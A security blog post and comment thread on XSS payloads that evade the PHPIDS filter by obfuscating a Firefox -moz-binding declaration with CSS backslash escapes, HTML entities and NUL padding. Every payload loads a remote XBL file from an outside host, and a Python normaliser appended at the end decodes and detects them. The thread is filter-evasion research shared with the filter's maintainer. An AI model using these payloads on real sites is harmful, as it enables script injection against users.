Awesome XSS

Hacking the PHPIDS again, I found some cool XSS:-

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

I’ve moved it onto two lines for correct display.

Who’d have thought that Firefox would allow all that within url() and CSS property names 😀

11 Responses to “Awesome XSS”

  1. 排 Γ₯°¾ DaCat writes:

    awezome gareth!! 😀
    anyway, I thought .mario disabled the \char thing a while ago.. or maybe it was just the \a and \l 😛

    Greetz!

  2. Gareth Heyes writes:

    hehe thanks, you next? 🙂

  3. Gareth Heyes writes:

    Check these out too 🙂

    <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
    #98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
    #92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
    #110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
    #99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
    &#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
    &#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>

    <div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
    #x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
    #x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
    #x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
    #x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
    &#x23&#x78&#x73&#x73&#x29>

  4. Gareth Heyes writes:

    <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

    <Q%^&*(£@!'” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

  5. Information security writes:

    A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If it's getting easier to test for XSS vulnerabilities, then it's getting easier to exploit those vulnerabilities.

  6. .mario writes:

    Gareth you bandit 😉 Hacking the PHPIDS while I visit my gram's place *g*

    Well done and of course fixed by now!

    Thanks and Greetings,
    .mario

  7. Gareth Heyes writes:

    Hehe a hacker always attacks at the most inconvenient time 😉

  8. Gareth Heyes writes:

    Believe it or not, this is also a working mozbinding lol :-
    <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>

  9. Gareth Heyes writes:

    <x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>

  10. .mario writes:

    Eew… that’s indeed incredible! We need those for the xssDB!

  11. Gareth Heyes writes:

    I’ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-

    <div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>

    Much easier than having to remember which characters can be escaped 😉
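Added example, not code from the post, PHPIDS or Hackvertor: a small Python normaliser that undoes the two layers these payloads stack (HTML character references as in comment 3, then CSS backslash escapes as in the post and comment 9) before a filter looks for -moz-binding, since a filter has to see the same bytes the browser's tokenizer sees. The samples are the post's payload and comment 3's hex-entity form verbatim plus a \000000-padded form constructed the way comment 9 does it; the function names are mine.

```python
import html
import re

# CSS backslash escape (CSS 2.1 section 4.1.3, CSS Syntax 3): one to six hex digits
# plus at most one whitespace, or any other single character taken literally (\m -> m).
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(.))", re.DOTALL)

def css_unescape(text: str) -> str:
    """Decode CSS backslash escapes the way a browser's CSS tokenizer does."""
    def replace(match: re.Match) -> str:
        hex_digits, literal = match.groups()
        if hex_digits is None:
            return literal
        code_point = int(hex_digits, 16)
        if code_point == 0:
            # The post shows Firefox of the day ignoring \0 and \000000 inside a property
            # name; CSS Syntax 3 maps a zero escape to U+FFFD. Neither is part of the ident.
            return ""
        if code_point > 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
            return "\ufffd"
        return chr(code_point)
    return _CSS_ESCAPE.sub(replace, text)

def normalize_style(attr_value: str) -> str:
    """Canonicalize a style attribute value before signature matching: undo HTML
    character references (semicolon optional, as in attributes), then CSS escapes."""
    return css_unescape(html.unescape(attr_value))

def has_moz_binding(attr_value: str) -> bool:
    """True when the decoded style value declares -moz-binding."""
    return re.search(r"-moz-binding\s*:", normalize_style(attr_value).lower()) is not None

# Constructed samples: the post's payload verbatim, the hex-entity form from
# comment 3 verbatim, and a \000000-padded form built the way comment 9 does.
PLAIN = "-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"
SAMPLES = {
    "backslash": r"\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)",
    "hex_entities": "&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&"
                    "#x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&"
                    "#x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&"
                    "#x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&"
                    "#x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C"
                    "&#x23&#x78&#x73&#x73&#x29",
    # Six hex digits is the maximum, so the character after \000000 can never be
    # swallowed by the escape (a bare \0 before "b" would read as the escape \0b).
    "nul_padded": r"\000000".join(PLAIN),
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, has_moz_binding(value), normalize_style(value))
```

A naive substring check for "-moz-binding" matches none of the three raw samples, while the decoded form of each is identical.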